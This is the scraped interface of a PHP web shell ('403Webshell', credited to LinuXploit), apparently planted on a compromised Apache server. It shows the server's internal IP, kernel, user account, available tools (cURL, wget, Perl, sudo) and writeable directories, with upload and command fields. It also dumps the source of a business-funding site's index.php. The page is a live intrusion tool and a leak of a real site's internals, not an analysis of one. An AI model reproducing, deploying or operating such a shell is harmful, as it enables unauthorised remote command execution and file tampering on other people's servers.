403Webshell
Server IP : 10.200.247.200  /  Your IP : 216.73.217.19
Web Server : Apache
System : Linux synergy-usa-sites 6.8.0-138-generic #138-Ubuntu SMP PREEMPT_DYNAMIC Fri Jul 31 22:41:49 UTC 2026 x86_64
User : jeremy ( 1001)
PHP Version : 8.4.25
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/coaching_sites/usbusinessfundingsolutions.com/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/coaching_sites/usbusinessfundingsolutions.com/index.php
<?php
require_once __DIR__ . '/includes/functions.php';
require_once __DIR__ . '/includes/data/testimonials.php';

$pageTitle       = 'US Business Funding Solutions - Professional Grant & Business Funding Assistance';
$pageDescription = 'Get expert guidance for business grants, funding opportunities, and professional grant writing services. We help entrepreneurs secure funding from government, private donors, and investors across all 50 states.';
$activePage      = 'index.php';

require __DIR__ . '/includes/header.php';
?>
      <!-- ============================================================= hero -->
      <section class="section section--hero section--subtle">
        <div class="container">
          <div class="grid grid--split grid--align-center grid--gap-xl">
            <div class="stack-xl animate-fade-in-up">
              <div class="stack">
                <h1 class="title-xl">
                  Secure the <span class="gradient-text">Funding Your Business</span> Deserves
                </h1>
                <p class="lead lead--lg" style="max-width: 42rem">
                  Get expert guidance from our team of professionals who specialize in business grants, funding opportunities, and grant writing services across all 50 states.
                </p>
              </div>

              <ul class="check-list">
                <li>
                  <svg aria-hidden="true"><use href="#icon-check-circle" /></svg>
                  <span class="text-muted">Professional grant writing &amp; business plan development</span>
                </li>
                <li>
                  <svg aria-hidden="true"><use href="#icon-check-circle" /></svg>
                  <span class="text-muted">Access to government, private, & foundation funding sources</span>
                </li>
                <li>
                  <svg aria-hidden="true"><use href="#icon-check-circle" /></svg>
                  <span class="text-muted">One-on-one dedicated support throughout the process</span>
                </li>
              </ul>

              <div class="button-row">
                <a class="btn btn--lg btn--gradient" href="company.php">
                  Our Company
                  <svg class="btn__arrow" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="1.5" aria-hidden="true"><path stroke-linecap="round" stroke-linejoin="round" d="M13.5 4.5 21 12m0 0-7.5 7.5M21 12H3" /></svg>
                </a>
                <a class="btn btn--lg btn--outline-primary" href="services.php">Learn About Our Services</a>
              </div>
            </div>

            <div class="hero-media animate-scale-in">
              <img src="assets/hero-business-meeting.jpg" alt="Professional business meeting discussing funding opportunities" />
              <div class="hero-media__overlay"></div>

              <div class="hero-badge">
                <div class="hero-badge__row">
                  <span class="hero-badge__dot" aria-hidden="true"></span>
                  <div>
                    <div class="font-semibold text-sm">Christina &amp; Kelly</div>
                    <div class="text-xs text-muted">Secured $1M+ funding</div>
                  </div>
                </div>
              </div>
            </div>
          </div>
        </div>
      </section>

      <!-- ========================================================= services -->
      <section class="section section--muted" id="services">
        <div class="container">
          <div class="center measure-lg stack-lg animate-fade-in">
            <h2 class="title-lg">Our Services</h2>
            <p class="lead">
              At U.S. Business Funding Solutions, we streamline the research and application process so you can
              access funding quickly and effectively. From personalized guidance and in-depth research to business
              plan development and professional application review, our team handles the heavy lifting while
              protecting your goals and information with the highest standards of ethics and confidentiality. We
              connect you to the right opportunities&mdash;whether grants, loans, or private investment&mdash;so you
              can focus on building your business and achieving lasting success.
            </p>
			<div class="aspect-video w-full bg-muted rounded-lg overflow-hidden">
				<video class="w-full h-full" controls="" poster="/professionalservices/jason_video_site_new.png" src="/professionalservices/jason_video_site_new.mp4"></video>
			</div>

            <div style="padding-top: 1.5rem">
              <h3 class="title-md" style="margin-bottom: 1.5rem">What We Provide:</h3>
              <ul class="check-list measure" style="text-align: left; gap: 1rem">
                <li>
                  <svg aria-hidden="true"><use href="#icon-check-circle" /></svg>
                  <span class="text-muted" style="font-size: 1.125rem">One-on-one partnership with a dedicated grant professional</span>
                </li>
                <li>
                  <svg aria-hidden="true"><use href="#icon-check-circle" /></svg>
                  <span class="text-muted" style="font-size: 1.125rem">Comprehensive grant research tailored to your needs</span>
                </li>
                <li>
                  <svg aria-hidden="true"><use href="#icon-check-circle" /></svg>
                  <span class="text-muted" style="font-size: 1.125rem">Custom business plans designed for funding success</span>
                </li>
                <li>
                  <svg aria-hidden="true"><use href="#icon-check-circle" /></svg>
                  <span class="text-muted" style="font-size: 1.125rem">Expert review and refinement of your applications</span>
                </li>
                <li>
                  <svg aria-hidden="true"><use href="#icon-check-circle" /></svg>
                  <span class="text-muted" style="font-size: 1.125rem">Access to a wide range of funding: grants, loans, tax credits, sponsorships, angel investors, and venture capital</span>
                </li>
              </ul>
            </div>
          </div>
        </div>
      </section>

      <!-- ===================================================== trust badges -->
      <section class="section section--muted-soft">
        <div class="container">
          <div class="center stack animate-fade-in" style="margin-bottom: 3rem">
            <h3 class="title-md">Trusted &amp; Accredited</h3>
            <p class="text-muted">
              We maintain the highest standards of professionalism and business integrity
            </p>
          </div>

          <div class="grid grid--2 grid--gap-lg measure">
            <div class="trust-item reveal">
              <div class="trust-item__frame">
                <img src="assets/us-chamber-logo.png" alt="US Chamber of Commerce" />
              </div>
              <div class="stack-sm center">
                <h4 class="font-semibold">US Chamber of Commerce</h4>
                <p class="text-sm font-semibold text-primary">Accredited Member</p>
                <p class="text-sm text-muted">Recognized business member in good standing</p>
              </div>
            </div>

            <div class="trust-item reveal">
              <div class="trust-item__frame">
                <img src="assets/dun-bradstreet-logo.png" alt="Dun &amp; Bradstreet" />
              </div>
              <div class="stack-sm center">
                <h4 class="font-semibold">Dun &amp; Bradstreet</h4>
                <p class="text-sm font-semibold text-primary">Verified Business</p>
                <p class="text-sm text-muted">Verified business credentials and ratings</p>
              </div>
            </div>
          </div>
        </div>
      </section>

      <!-- ===================================================== testimonials -->
      <section class="section" id="testimonials">
        <div class="container">
          <div class="center stack animate-fade-in" style="margin-bottom: 4rem">
            <h2 class="title-lg">Success Stories from Our Clients</h2>
            <p class="lead lead--lg measure">
              See how we've helped entrepreneurs and business owners across the country secure funding and achieve their dreams.
            </p>
          </div>

          <?= testimonial_grid(
            $featuredTestimonials,
            ['images' => true, 'format_name' => true, 'card_class' => 'card--lift reveal']
          ) ?>
        </div>
      </section>
    
<?php require __DIR__ . '/includes/footer.php'; ?>

Youez - 2016 - github.com/yon3zu
LinuXploit